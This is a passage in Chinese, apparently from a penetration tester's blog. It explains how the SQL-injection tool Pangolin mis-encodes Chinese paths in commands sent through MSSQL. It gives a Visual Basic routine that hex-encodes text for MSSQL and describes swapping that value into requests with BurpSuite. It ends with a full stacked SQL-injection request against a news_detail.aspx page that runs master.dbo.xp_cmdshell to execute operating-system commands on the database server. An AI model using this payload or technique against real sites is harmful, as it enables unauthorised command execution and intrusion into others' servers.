- 0xd600d000ce00c400c200b700be00b600
dir
c:\中文路径”这种cmd命令执行总是出错,后来用BurpSuite对发送的数据包进行分析,发现Pangolin使用了一种类似URLEncode
的编码方式对中文进行编码。
如“中文路径”被其编码成为:
很明显,这里每个中文字符被拆分成了两个双字节且均以00结尾,不符合Unicode的规则,如果是Unicode编码的话,每个中文应当占用2个字节,不应有00出现。
看来Pangolin对中文的处理有问题,不过我没办法修改它的二进制代码,只能自己做一个编码程序,然后配合BurpSuite把渗透测试工作执 行下去。下面是处理编码的一个小程序中的核心代码,在Visual Basic 2010 Express Edition编译通过。
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
Dim strOut As String = ""
For i = 1 To Len(TextBox1.Text) '逐个遍历传入的字符
Dim strChar As String = ""
strChar = Hex(AscW(Mid(TextBox1.Text, i, 1))) '将当前字符转为16进制表示的Unicode编码
If Len(strChar) = 2 Then '如果是ASCII字符,在其后加上00
strChar = strChar + "00"
Else
strChar = Mid(strChar, 3, 2) + Mid(strChar, 1, 2) '将该编码高低位互换(否则MSSQL解析错误)
End If
strOut = strOut + strChar
Next
TextBox2.Text = "0x" + strOut.ToLower
End Sub
使用该程序对汉字“中文路径”进行编码后,结果如下:
- 0x2d4e8765ef8d845f
在Pangolin中设置BurpSuite代理,使用BurpSuite把Pangolin发送的数据包中@z=??的问号部分替换为自己计算的字符编码即可得到想要的结果。
- GET /news_detail.aspx?newsid=3941%20;declare%20@z%20nvarchar(4000)%20set%20@z=??%20insert%20into%20[pangolin_test_table](resulttxt)%20exec%20master.dbo.xp_cmdshell%20@z;alter%20table%20[pangolin_test_table]%20add%20id%20int%20not%20null%20identity%20(1,1)-- HTTP/